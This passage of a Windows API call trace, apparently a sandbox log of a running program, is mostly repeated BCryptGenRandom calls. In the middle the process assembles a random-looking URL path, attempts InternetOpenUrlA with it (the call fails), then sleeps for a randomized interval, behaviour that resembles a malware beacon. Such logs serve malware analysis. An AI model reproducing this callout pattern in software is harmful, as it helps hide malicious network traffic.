pbBuffer=0x46ffd5f) returned 0x0 [0274.460] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.460] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.460] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.460] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.460] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.460] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.461] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.461] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.461] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.461] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.461] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.461] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.461] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.461] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.462] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.462] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.462] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.462] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0274.462] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.462] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.462] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.462] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0274.462] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.462] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.463] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.463] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0274.463] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.463] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.463] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.463] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.463] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.463] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.463] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.464] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.464] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.464] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.464] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.464] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0274.464] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.464] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d5e89, cbBuffer=0x19, dwFlags=0x2 | out: pbBuffer=0x4d5e89) returned 0x0 [0274.465] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.465] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.465] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.465] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.465] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.465] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.465] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.465] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.466] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.466] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0274.466] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.466] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0274.466] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.466] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.467] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.615] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.615] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.615] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.615] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.615] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.615] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.615] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.616] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.616] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0274.616] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.616] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0274.616] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.616] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.616] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.616] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.617] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.617] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.617] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.617] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.617] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.617] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.617] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.617] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0274.617] GetProcessHeap () returned 0x440000 [0274.617] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473770 [0274.617] lstrcpyA (in: lpString1=0x473770, lpString2="\x81\x03" | out: lpString1="\x81\x03") returned="\x81\x03" [0274.617] lstrcatA (in: lpString1="\x81\x03", lpString2="/w70hitzS94yTnai8pnlw0n751x1lthtVuhvx2igt/BOxpakmbq5gaSh5gx62luvLN/okat1eqqaga3tadvdakemboi1cr8r8pSeaapL/rhgh31dlogdD8fAixxqbOs2G/" | out: lpString1="\x81\x03/w70hitzS94yTnai8pnlw0n751x1lthtVuhvx2igt/BOxpakmbq5gaSh5gx62luvLN/okat1eqqaga3tadvdakemboi1cr8r8pSeaapL/rhgh31dlogdD8fAixxqbOs2G/") returned="\x81\x03/w70hitzS94yTnai8pnlw0n751x1lthtVuhvx2igt/BOxpakmbq5gaSh5gx62luvLN/okat1eqqaga3tadvdakemboi1cr8r8pSeaapL/rhgh31dlogdD8fAixxqbOs2G/" [0274.618] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0274.618] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x81\x03/w70hitzS94yTnai8pnlw0n751x1lthtVuhvx2igt/BOxpakmbq5gaSh5gx62luvLN/okat1eqqaga3tadvdakemboi1cr8r8pSeaapL/rhgh31dlogdD8fAixxqbOs2G/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0274.618] GetProcessHeap () returned 0x440000 [0274.618] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473770 | out: hHeap=0x440000) returned 1 [0274.618] GetProcessHeap () returned 0x440000 [0274.618] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4d5e20 | out: hHeap=0x440000) returned 1 [0274.618] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0274.618] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0274.618] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.619] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0274.619] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0274.619] Sleep (dwMilliseconds=0x1cd7b) [0274.808] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.808] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0274.808] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.808] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0274.808] GetProcessHeap () returned 0x440000 [0274.808] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xc6) returned 0x4d5e20 [0274.809] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.809] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0274.809] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.809] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d5e21, cbBuffer=0x19, dwFlags=0x2 | out: pbBuffer=0x4d5e21) returned 0x0 [0274.809] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.809] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.810] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.810] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.810] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.810] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0274.810] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.810] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.811] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.811] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.811] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.811] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.811] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.811] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.812] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.812] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.812] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.812] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.812] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.812] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.812] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.812] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.813] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.813] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0274.813] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.813] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.813] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.813] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0274.814] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.814] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.814] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.814] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.814] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.814] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0274.814] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.814] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.815] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.815] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0274.815] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.815] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d5e3a, cbBuffer=0x2b, dwFlags=0x2 | out: pbBuffer=0x4d5e3a) returned 0x0 [0274.815] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.815] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.816] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.816] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.816] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.816] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.816] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.816] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0274.817] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.817] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.817] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.817] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0274.817] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.817] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.818] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.818] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.818] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.818] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.818] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.818] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.818] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.818] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.819] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.820] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.820] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.820] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.821] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.821] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0274.821] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.821] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.822] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.822] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.822] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.822] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.822] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.822] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0274.822] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.822] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0274.823] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.823] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.823] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.823] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.823] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.823] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0274.823] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.823] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.824] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.824] 